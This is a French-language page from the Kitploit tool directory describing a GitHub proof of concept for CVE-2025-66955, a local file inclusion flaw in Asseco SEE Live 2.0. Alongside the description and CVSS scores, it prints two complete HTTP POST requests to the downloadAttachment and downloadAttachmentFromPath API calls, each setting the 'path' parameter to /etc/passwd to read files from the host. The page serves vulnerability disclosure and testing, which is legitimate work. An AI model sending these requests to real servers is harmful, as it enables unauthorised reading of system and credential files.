Skip to content
KitploitKITPLOIT
OutilsBlog
Log in
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-66955 — Inclusion de fichiers locaux dans les composants Plan de contact, E-mail, SMS et Fax d'Asseco SEE Live 2.0 permet aux utilisateurs authentifiés distants d'accéder aux fichiers sur l'hôte via le paramètre « path » dans les appels API downloadAttachment et downloadAttachmentFromPath. | Kitploit
Outils/GitHubGitHub/thewoodenbench/cve-2025-66955
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'Intrusion
GitHubthewoodenbench/cve-2025-66955

CVE-2025-66955

Voir le dépôt
5il y a 9 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

À propos

Inclusion de fichiers locaux dans les composants Plan de contact, E-mail, SMS et Fax d'Asseco SEE Live 2.0 permet aux utilisateurs authentifiés distants d'accéder aux fichiers sur l'hôte via le paramètre « path » dans les appels API downloadAttachment et downloadAttachmentFromPath.

Partager

CVE-2025-66955

Inclusion de fichier local dans les composants Contact Plan, E-Mail, SMS et Fax d'Asseco SEE Live 2.0 permet à des utilisateurs authentifiés à distance d'accéder à des fichiers sur l'hôte via le paramètre "path" dans les appels API downloadAttachment et downloadAttachmentFromPath.

Vecteurs CVSS

  • CVSS 3.1: 7.7, CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
  • CVSS 4.0: 8.4, CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:H/SA:N

Vecteurs d'attaque

Les requêtes HTTP nécessitent une authentification faible.

downloadAttachment

POST /live20/index.php HTTP/2
Host: [REDACTED]
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary

------WebKitFormBoundary
Content-Disposition: form-data; name="requestType"

HTTP
------WebKitFormBoundary
Content-Disposition: form-data; name="method"

Email.downloadAttachment
------WebKitFormBoundary
Content-Disposition: form-data; name="id"

[REDACTED]
------WebKitFormBoundary
Content-Disposition: form-data; name="path"

/etc/passwd
------WebKitFormBoundary
Content-Disposition: form-data; name="downloadToken"

[REDACTED]
------WebKitFormBoundary--

downloadAttachmentFromPath

POST /live20/index.php HTTP/2
Host: [REDACTED]
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary

------WebKitFormBoundary
Content-Disposition: form-data; name="requestType"

HTTP
------WebKitFormBoundary
Content-Disposition: form-data; name="method"

Email.downloadAttachmentFromPath
------WebKitFormBoundary
Content-Disposition: form-data; name="path"

/etc/passwd
------WebKitFormBoundary
Content-Disposition: form-data; name="downloadToken"

[REDACTED]
------WebKitFormBoundary
Content-Disposition: form-data; name="model"

Template
------WebKitFormBoundary--

Télécharger l’outil